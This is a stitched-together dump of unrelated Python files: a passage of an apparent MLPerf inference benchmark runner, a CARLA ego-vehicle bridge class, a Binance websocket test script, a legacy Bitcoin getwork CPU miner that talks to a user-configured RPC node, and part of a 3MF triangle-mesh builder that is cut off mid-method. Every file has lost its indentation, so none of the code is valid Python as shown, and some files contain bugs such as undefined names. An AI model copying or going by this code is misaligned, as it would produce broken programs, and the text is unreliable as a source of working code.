from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class Runner:
def __init__(self, model, ds, threads, post_proc=None):
self.tasks = Queue(maxsize=threads * 5)
self.workers = []
self.model = model
self.post_process = post_proc
self.threads = threads
self.result_dict = {}
self.take_accuracy = False
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
try:
# run the prediction
results = self.model.predict({self.model.inputs[0]: qitem.img})
if self.take_accuracy:
response = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
except Exception as ex: # pylint: disable=broad-except
log.error("execute_parallel thread: %s", ex)
finally:
response = []
for query_id in qitem.query_id:
# FIXME: unclear what to return here
response.append(lg.QuerySampleResponse(query_id, 0, 0))
lg.QuerySamplesComplete(response)
tasks_queue.task_done()
def start_pool(self):
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.take_accuracy = take_accuracy
self.post_process.start()
def enqueue(self, id, ids, data, label):
item = Item(id, ids, data, label)
self.tasks.put(item)
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
# this is what we record for each run
result = {
"mean": np.mean(result_list),
"took": took,
"qps": len(result_list) / took,
"count": len(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"good_items": result_dict["good"],
"total_items": result_dict["total"],
"accuracy": 100. * result_dict["good"] / result_dict["total"],
}
if "mAP" in result_dict:
result["mAP"] = result_dict["mAP"]
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.6f}, time={:.2f}, acc={:.2f}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, result["accuracy"], len(result_list), buckets_str))
def main():
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=args.count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
#
# make one pass over the dataset to validate accuracy
#
count = args.count if args.count else ds.get_item_count()
runner = Runner(model, ds, args.threads, post_proc=post_proc)
runner.start_pool()
# warmup
log.info("warmup ...")
ds.load_query_samples([0])
for _ in range(50):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
def issue_query(query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
data, label = ds.get_samples(idx)
runner.enqueue(query_id, idx, data, label)
def process_latencies(latencies_ns):
global last_timeing
last_timeing = [t / 10000000. for t in latencies_ns]
sut = lg.ConstructSUT(issue_query, process_latencies)
qsl = lg.ConstructQSL(count, count, ds.load_query_samples, ds.unload_query_samples)
scenarios = [
lg.TestScenario.SingleStream,
lg.TestScenario.MultiStream,
lg.TestScenario.Server,
# lg.TestScenario.Offline,
]
for scenario in scenarios:
for target_latency in args.max_latency:
log.info("starting {}, latency={}".format(scenario, target_latency))
settings = lg.TestSettings()
settings.scenario = scenario
if args.qps:
settings.enable_spec_overrides = True
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if args.time:
settings.enable_spec_overrides = True
settings.override_min_duration_ms = args.time * MILLI_SEC
settings.override_max_duration_ms = args.time * MILLI_SEC
qps = args.qps or 100
settings.override_min_query_count = qps * args.time
settings.override_max_query_count = qps * args.time
if args.time or args.qps:
settings.mode = lg.TestMode.PerformanceOnly
# FIXME: add SubmissionRun once available
settings.enable_spec_overrides = True # FIXME: needed because of override_target_latency_ns
settings.single_stream_expected_latency_ns = int(target_latency * NANO_SEC)
settings.override_target_latency_ns = int(target_latency * NANO_SEC)
# reset result capture
result_dict = {"good": 0, "total": 0}
runner.start_run(result_dict, True)
start = time.time()
lg.StartTest(sut, qsl, settings)
# aggregate results
post_proc.finalize(result_dict, ds)
add_results(final_results, "{}-{}".format(scenario, target_latency),
result_dict, last_timeing, time.time() - start)
#
# write final results
#
if args.output:
with open(args.output, "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
if __name__ == "__main__":
main()
|
ego_vehicle.py | #!/usr/bin/env python
#
# Copyright (c) 2018-2019 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Classes to handle Carla vehicles
"""
import math
import numpy
from icvSubscriber import Subscriber
#import rospy
from protocol.std_msgs.msg import ColorRGBA
from protocol.std_msgs.msg import Bool
from geometry_msgs.msg import Twist
from threading import Thread, Lock, Event
from carla import VehicleControl
from carla import Vector3D
import time
from vehicle import Vehicle
import transforms as transforms
from icvPublisher import Publisher
from icvSubscriber import Subscriber
import threading
from carla_msgs.msg import CarlaEgoVehicleInfo, CarlaEgoVehicleInfoWheel,\
CarlaEgoVehicleControl, CarlaEgoVehicleStatus
class EgoVehicle(Vehicle):
"""
Vehicle implementation details for the ego vehicle
"""
def __init__(self, carla_actor, parent, communication, vehicle_control_applied_callback):
"""
Constructor
:param carla_actor: carla actor object
:type carla_actor: carla.Actor
:param parent: the parent of this
:type parent: carla_icv_bridge.Parent
:param communication: communication-handle
:type communication: carla_icv_bridge.communication
"""
super(EgoVehicle, self).__init__(carla_actor=carla_actor,
parent=parent,
communication=communication,
prefix=carla_actor.attributes.get('role_name'))
self.vehicle_info_published = False
self.vehicle_control_override = False
self._vehicle_control_applied_callback = vehicle_control_applied_callback
self.sub1=Subscriber(self.get_topic_prefix() + "/vehicle_control_cmd")
self.sub2=Subscriber(self.get_topic_prefix() + "/vehicle_control_cmd_manual")
self.sub3=Subscriber(self.get_topic_prefix() + "/vehicle_control_manual_override")
self.sub4=Subscriber(self.get_topic_prefix() + "/enable_autopilot")
self.sub5=Subscriber(self.get_topic_prefix() + "/twist_cmd")
self.Sec_loop=0.02
self.control_subscriber=CarlaEgoVehicleControl()
self.manual_control_subscriber=CarlaEgoVehicleControl()
self.control_override_subscriber= Bool()
self.enable_autopilot_subscriber= Bool()
self.twist_control_subscriber= Twist()
self.pub1=Publisher(self.get_topic_prefix() + "/vehicle_info")
self.pub2=Publisher(self.get_topic_prefix() + "/vehicle_status")
self.update_command_thread = Thread(target=self._update_commands_thread)
self.update_command_thread.start()
def get_marker_color(self):
"""
Function (override) to return the color for marker messages.
The ego vehicle uses a different marker color than other vehicles.
:return: the color used by a ego vehicle marker
:rtpye : std_msgs.ColorRGBA
"""
color = ColorRGBA()
color.r = 0
color.g = 255
color.b = 0
return color
def send_vehicle_msgs(self):
"""
send messages related to vehicle status
:return:
"""
vehicle_status = CarlaEgoVehicleStatus(
header=self.get_msg_header("map"))
vehicle_status.velocity = self.get_vehicle_speed_abs(self.carla_actor)
vehicle_status.acceleration.linear = transforms.carla_vector_to_icv_vector_rotated(
self.carla_actor.get_acceleration(),
self.carla_actor.get_transform().rotation)
vehicle_status.orientation = self.get_current_icv_pose().orientation
vehicle_status.control.throttle = self.carla_actor.get_control().throttle
vehicle_status.control.steer = self.carla_actor.get_control().steer
vehicle_status.control.brake = self.carla_actor.get_control().brake
vehicle_status.control.hand_brake = self.carla_actor.get_control().hand_brake
vehicle_status.control.reverse = self.carla_actor.get_control().reverse
vehicle_status.control.gear = self.carla_actor.get_control().gear
vehicle_status.control.manual_gear_shift = self.carla_actor.get_control().manual_gear_shift
self.pub2.publish(vehicle_status)
# only send vehicle once (in latched-mode)
if not self.vehicle_info_published:
self.vehicle_info_published = True
vehicle_info = CarlaEgoVehicleInfo()
vehicle_info.id = self.carla_actor.id
vehicle_info.type = self.carla_actor.type_id
vehicle_info.rolename = self.carla_actor.attributes.get('role_name')
vehicle_physics = self.carla_actor.get_physics_control()
for wheel in vehicle_physics.wheels:
wheel_info = CarlaEgoVehicleInfoWheel()
wheel_info.tire_friction = wheel.tire_friction
wheel_info.damping_rate = wheel.damping_rate
wheel_info.max_steer_angle = math.radians(wheel.max_steer_angle)
vehicle_info.wheels.append(wheel_info)
vehicle_info.max_rpm = vehicle_physics.max_rpm
vehicle_info.max_rpm = vehicle_physics.max_rpm
vehicle_info.moi = vehicle_physics.moi
vehicle_info.damping_rate_full_throttle = vehicle_physics.damping_rate_full_throttle
vehicle_info.damping_rate_zero_throttle_clutch_engaged = \
vehicle_physics.damping_rate_zero_throttle_clutch_engaged
vehicle_info.damping_rate_zero_throttle_clutch_disengaged = \
vehicle_physics.damping_rate_zero_throttle_clutch_disengaged
vehicle_info.use_gear_autobox = vehicle_physics.use_gear_autobox
vehicle_info.gear_switch_time = vehicle_physics.gear_switch_time
vehicle_info.clutch_strength = vehicle_physics.clutch_strength
vehicle_info.mass = vehicle_physics.mass
vehicle_info.drag_coefficient = vehicle_physics.drag_coefficient
vehicle_info.center_of_mass.x = vehicle_physics.center_of_mass.x
vehicle_info.center_of_mass.y = vehicle_physics.center_of_mass.y
vehicle_info.center_of_mass.z = vehicle_physics.center_of_mass.z
self.pub1.publish(vehicle_info)
def update(self, frame, timestamp):
"""
Function (override) to update this object.
On update ego vehicle calculates and sends the new values for VehicleControl()
:return:
"""
self.send_vehicle_msgs()
super(EgoVehicle, self).update(frame, timestamp)
def _update_commands_thread (self):
time.sleep(self.Sec_loop)
if self.sub4.getstate():
self.sub4.reset()
self.enable_autopilot_updated()
if self.sub3.getstate():
self.sub3.reset()
self.control_command_override()
if self.sub1.getstate() or self.sub2.getstate():
self.sub1.reset()
self.sub2.reset()
self.control_command_updated()
if self.sub5.getstate():
self.sub3.reset()
self.twist_command_updated()
def destroy(self):
"""
Function (override) to destroy this object.
Terminate icv subscriptions
Finally forward call to super class.
:return:
"""
#rospy.logdebug("Destroy Vehicle(id={})".format(self.get_id()))
#self.control_subscriber.unregister()
self.control_subscriber = None
#self.enable_autopilot_subscriber.unregister()
self.enable_autopilot_subscriber = None
#self.twist_control_subscriber.unregister()
self.twist_control_subscriber = None
#self.control_override_subscriber.unregister()
self.control_override_subscriber = None
#self.manual_control_subscriber.unregister()
self.manual_control_subscriber = None
super(EgoVehicle, self).destroy()
def twist_command_updated(self):
"""
Set angular/linear velocity (this does not respect vehicle dynamics)
"""
if not self.vehicle_control_override:
sub5.subscribe( self.twist_control_subscriber)
twist=self.twist_control_subscriber
angular_velocity = Vector3D()
angular_velocity.z = math.degrees(twist.angular.z)
rotation_matrix = transforms.carla_rotation_to_numpy_rotation_matrix(
self.carla_actor.get_transform().rotation)
linear_vector = numpy.array([twist.linear.x, twist.linear.y, twist.linear.z])
rotated_linear_vector = rotation_matrix.dot(linear_vector)
linear_velocity = Vector3D()
linear_velocity.x = rotated_linear_vector[0]
linear_velocity.y = -rotated_linear_vector[1]
linear_velocity.z = rotated_linear_vector[2]
# rospy.logdebug("Set velocity linear: {}, angular: {}".format(
# linear_velocity, angular_velocity))
self.carla_actor.set_velocity(linear_velocity)
self.carla_actor.set_angular_velocity(angular_velocity)
def control_command_override(self):
"""
Set the vehicle control mode according to icv topic
"""
self.sub3.subscribe( self.control_override_subscriber)
self.vehicle_control_override
def control_command_updated(self):
"""
Receive a CarlaEgoVehicleControl msg and send to CARLA
This function gets called whenever a icv CarlaEgoVehicleControl is received.
If the mode is valid (either normal or manual), the received icv message is
converted into carla.VehicleControl command and sent to CARLA.
This bridge is not responsible for any restrictions on velocity or steering.
It's just forwarding the icv input to CARLA
:param manual_override: manually override the vehicle control command
:param icv_vehicle_control: current vehicle control input received via icv
:type icv_vehicle_control: carla_msgs.msg.CarlaEgoVehicleControl
:return:
"""
if self.vehicle_control_override:
sub2.subscribe( self.manual_control_subscriber)
icv_vehicle_control=self.manual_control_subscriber
else:
sub1.subscribe( self.control_subscriber)
icv_vehicle_control=self.control_subscriber
vehicle_control = VehicleControl()
vehicle_control.hand_brake = icv_vehicle_control.hand_brake
vehicle_control.brake = icv_vehicle_control.brake
vehicle_control.steer = icv_vehicle_control.steer
vehicle_control.throttle = icv_vehicle_control.throttle
vehicle_control.reverse = icv_vehicle_control.reverse
self.carla_actor.apply_control(vehicle_control)
self._vehicle_control_applied_callback(self.get_id())
def enable_autopilot_updated(self):
"""
Enable/disable auto pilot
:param enable_auto_pilot: should the autopilot be enabled?
:type enable_auto_pilot: std_msgs.Bool
:return:
"""
#rospy.logdebug("Ego vehicle: Set autopilot to {}".format(enable_auto_pilot.data))
self.sub4.subscribe( self.enable_autopilot_subscriber)
self.carla_actor.set_autopilot(self.enable_autopilot_subscriber.data)
@staticmethod
def get_vector_length_squared(carla_vector):
"""
Calculate the squared length of a carla_vector
:param carla_vector: the carla vector
:type carla_vector: carla.Vector3D
:return: squared vector length
:rtype: float64
"""
return carla_vector.x * carla_vector.x + \
carla_vector.y * carla_vector.y + \
carla_vector.z * carla_vector.z
@staticmethod
def get_vehicle_speed_squared(carla_vehicle):
"""
Get the squared speed of a carla vehicle
:param carla_vehicle: the carla vehicle
:type carla_vehicle: carla.Vehicle
:return: squared speed of a carla vehicle [(m/s)^2]
:rtype: float64
"""
return EgoVehicle.get_vector_length_squared(carla_vehicle.get_velocity())
@staticmethod
def get_vehicle_speed_abs(carla_vehicle):
"""
Get the absolute speed of a carla vehicle
:param carla_vehicle: the carla vehicle
:type carla_vehicle: carla.Vehicle
:return: speed of a carla vehicle [m/s >= 0]
:rtype: float64
"""
speed = math.sqrt(EgoVehicle.get_vehicle_speed_squared(carla_vehicle))
return speed
|
dev_test_cex_full_non_stop.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_test_cex_full_non_stop.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import math
import os
import requests
import sys
import time
import threading
try:
from binance.client import Client
except ImportError:
print("Please install `python-binance`! https://pypi.org/project/python-binance/#description")
sys.exit(1)
binance_api_key = ""
binance_api_secret = ""
channels = {'aggTrade', 'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_2h', 'kline_4h',
'kline_6h', 'kline_8h', 'kline_12h', 'kline_1d', 'kline_3d', 'kline_1w', 'kline_1M', 'miniTicker',
'ticker', 'bookTicker', 'depth5', 'depth10', 'depth20', 'depth', 'depth@100ms'}
arr_channels = {'!miniTicker', '!ticker', '!bookTicker'}
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
time.sleep(30)
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
# create instance of BinanceWebSocketApiManager
#binance_websocket_api_manager = BinanceWebSocketApiManager(throw_exception_if_unrepairable=True)
binance_websocket_api_manager = BinanceWebSocketApiManager(throw_exception_if_unrepairable=False)
print("starting monitoring api!")
binance_websocket_api_manager.start_monitoring_api()
try:
binance_rest_client = Client(binance_api_key, binance_api_secret)
binance_websocket_api_manager = BinanceWebSocketApiManager()
except requests.exceptions.ConnectionError:
print("No internet connection?")
sys.exit(1)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
markets = []
data = binance_rest_client.get_all_tickers()
for item in data:
markets.append(item['symbol'])
private_stream_id = binance_websocket_api_manager.create_stream(["!userData"],
["arr"],
api_key=binance_api_key,
api_secret=binance_api_secret,
stream_label="userData stream!")
binance_websocket_api_manager.create_stream(arr_channels, "arr", stream_label="`arr` channels")
divisor = math.ceil(len(markets) / binance_websocket_api_manager.get_limit_of_subscriptions_per_stream())
max_subscriptions = math.ceil(len(markets) / divisor)
for channel in channels:
if len(markets) <= max_subscriptions:
binance_websocket_api_manager.create_stream(channel, markets, stream_label=channel)
else:
loops = 1
i = 1
markets_sub = []
for market in markets:
markets_sub.append(market)
if i == max_subscriptions or loops * max_subscriptions + i == len(markets):
binance_websocket_api_manager.create_stream(channel, markets_sub,
stream_label=str(channel + "_" + str(i)))
markets_sub = []
i = 1
loops += 1
i += 1
while True:
binance_websocket_api_manager.print_summary()
time.sleep(1)
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class GencoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = GencoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8638
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
LightPicture.py |
""" VERSION INFO
Current:
v_4_2
Tested TriangeMeshBuilder basic functionality, saving to 3mf file, timing
* see test test_random_big_file for details of usage
History:
v_4_1
Added TriangleMeshBuilder class
Integrated TriangleMesh and 3mfFileWriter classes into the TriangleMeshBuilder
!! see test_create_sample_file in unit test file
!! for a quick reference and wirking example
v_3_3
Working on Triangle Mesh, added 3mffilewriter class
v_3_2
Merged Vertex and Coordinate classes together
"""
from PIL import Image
import xml.etree.ElementTree as ET
from xml.dom import minidom
import os
import shutil
import timeit
import subprocess
import threading
import time
import random
class Vertex:
"""
This class represents the idea of Vertex.
in 3d graphics context:
Vertex i s point defined in 3d space
in 3mf context:
also has additional 'sequence number' assigned. This is it's place on the 3mf vertices list.
"""
def __init__(self, key=None):
self.coordinates = self._coordinates # Interpret key in 'coordinates' context
self._self_coordinates = [] # Actual self Coordinates
self.sequence_number = None # Return or set 3mf vertex sequence number
self.parents = self._parents # Interpret key in 'parent' context
self._self_parents = set()
self.scale = self._scale # Return scaled Coordinate
self.translate = self._translate # Return translated Coordinate e
# Try passing key in coordinates context
try:
assigned = self._coordinates(key)
except Exception as e:
print(self, e)
raise e
# if key not evaluated then try in parents context
if not assigned:
try:
assigned = self._parents(key)
except Exception as e:
print(self, e)
raise e
def _parents(self, key=None):
"""
This is how Vertex treats objects passed in the context of 'parent' concept
"""
# key is None
# return own parents
if key is None:
return self._self_parents
# key is of type Triangle
# check if the Triangle is already a parent, if not then add as a parent
if type(key) is Triangle:
try:
self._self_parents.add(key)
except Exception as e:
print(self, e)
raise e
else:
return self._self_parents
def _coordinates(self, key=None):
"""
Set or Get coordinates of this Vertex
Also evaluate key for the __init__ method
:param key: None, int, iterable of 3 ints
:return: mainly own Coordinates,
"""
# if key is None
if key is None:
if self._self_coordinates is not None:
return self._self_coordinates
else:
return True
# if key is iterable of 3 ints
key_len = None
try:
key_len = len(key)
except Exception as e:
pass
else: # key is iterable
# assign to own coordinates
if type(key_len) is int and key_len == 3:
for c in key:
if type(c) is not float and type(c) is not int:
raise TypeError("Expected exactly 3 numbers")
self._self_coordinates = key
return True
else:
return False
# if argument parses to int
# pass it to own Coordinates object
v_idx = None
try:
v_idx = int(key)
except Exception as e:
pass
if type(v_idx) is int:
if -3 < v_idx < 3:
return self._self_coordinates[v_idx]
return False
def _scale(self, key=None):
"""
Scale corrdinate using an iterable
"""
try:
own_dimension = len(self._self_coordinates)
key_dimension = len(key)
except Exception as e:
print(self, e)
raise e
for i in range(own_dimension):
try:
self._self_coordinates[i] *= key[i]
except Exception as e:
print(self, e)
raise e
return self
def _translate(self, key=None):
"""
Translate corrdinate using an iterable
"""
try:
own_dimension = len(self._self_coordinates)
key_dimension = len(key)
except Exception as e:
print(str(e))
raise e
for i in range(own_dimension):
try:
self._self_coordinates[i] += key[i]
except Exception as e:
print(str(e))
raise e
return self
def __str__(self):
s = f'(Vertex.\n' \
+ 'Coordinate: ' + str(self.coordinates) + '\n' \
+ 'Sequence number: ' + str(self.sequence_number) + ')'
return s
def __len__(self):
try:
own_length = len(self._self_coordinates)
except Exception as e:
print(self, e)
raise e
return own_length
class Triangle:
"""
A Triangle is here, because it represents a part of the problem and a part of it's solution.
As a part of the problem it represents an important concept in the domain of computer 3D graphics,
and what I'm here for is kind of this very thing:
to create a 3D surface (namely: the problem, the unknown thats being solved fot) for printing, using a computer.
> So, 3D model are represented as a mesh of interconnected triangles.
As a part of the solution it is a necessity for constructing a 3mf file, which is accepted by a slicer app
(I chose 3mf because of how effortless it appeared to me to programatically built a 3d mesh
while thinking of it in a rather familiar context of points and triangles in 3d space)
> So, 3mf describes surfaces as interconnected triangles in a 3d space
"""
def __init__(self, key=None):
self.vertices = self._vertices # Vertex object(s) handling ('children')
self._self_v_0 = None # Actual self vertex #0
self._self_v_1 = None # Actual self vertex #1
self._self_v_2 = None # Actual self vertex #2
self.parent_mesh = self._parent_mesh # TriangleMesh object handling ('parent')
self._self_parent_mesh = None
self.flip = NotImplemented # Return or set self flipped
# Try passing the key to self._vertices
try:
assigned = self._vertices(key)
except Exception as e:
print(self, e)
raise e
else:
if not assigned:
raise TypeError("Unexpected key type")
def _vertices(self, key=None):
"""
This is what triangle thinks of Vertices
This explains what triangle would like to do with a Vertex, if if could recognise any
:param key: None, int in range <0,3>, Vertex object(s)
:return: mainly own vertices
"""
# if argument is None
# return the sequence of own vertices
if key is None:
return [self._self_v_0, self._self_v_1, self._self_v_2]
# if argument is Vertex object
# # return
if type(key) is Vertex:
raise TypeError("The triangle does not know what to do with a single Vertex object")
# if argument parses to int
# return
v_idx = None
try:
v_idx = int(key)
except Exception as e:
pass
if type(v_idx) is int:
if v_idx == 0:
return self._self_v_0
elif v_idx == 1:
return self._self_v_1
elif v_idx == 2:
return self._self_v_2
else:
raise IndexError("Index value out of range")
# if argument is an iterable of length 3
key_len = None
try:
key_len = len(key)
except Exception as e:
pass
else:
if key_len is not None and key_len == 3:
# key is iterable of length 3
if type(key[0]) is Vertex and \
type(key[1]) is Vertex and \
type(key[2]) is Vertex:
# if a triangle is given 3 vertices, it adopts them
try:
key[0].parent_triangle = self
key[1].parent_triangle = self
key[2].parent_triangle = self
except Exception as e:
# print(self, e)
pass
self._self_v_0 = key[0]
self._self_v_1 = key[1]
